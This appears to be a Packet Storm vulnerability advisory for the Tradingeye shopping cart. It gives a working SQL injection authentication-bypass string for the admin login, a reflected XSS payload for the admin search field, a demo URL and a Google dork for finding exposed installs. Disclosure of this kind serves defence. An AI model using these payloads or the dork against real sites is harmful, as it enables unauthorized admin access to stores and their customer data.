Tradingeye suffers from cross site scripting and remote SQL injection vulnerabilities.
412df99e9baca4b68d50825e8e2b587fdb4a839a39a95b8d15c50d5a6aa419ca %+
$.......#........4.........|)........0............\/\/ %+
%+
%+
%++++++++++++++++++++++++++++++++++++++++
# Exploit Title: Tradingeye Multiple Vulnerabilities
# Vendor: www.tradingeye.com
# Date: 12th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork: Powered by Tradingeye. © 2009 Tradingeye v6 demo
*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
Tradingeye is a fully-featured web standards compliant Shopping Cart & CMS,
built from the ground up with web accessibility and SEO in mind. Tradingeye
is the
choice of thousands of online retailers who care about accessibility,
usability and most importantly - results.
******************************************************************************************************************************************************************************************
(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://demov6.tradingeye.com/adminindex.php
EXPLOIT:
Username: ' or 0=0 #
Password: ' or 0=0 #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.
Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS Vulnerability in admin panel(search field)
{Demo}:
http://demov6.tradingeye.com/user/adminindex.php?action=user.home
Exploit: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>
*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--
*****************************************************************************************************************************************************************************************
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed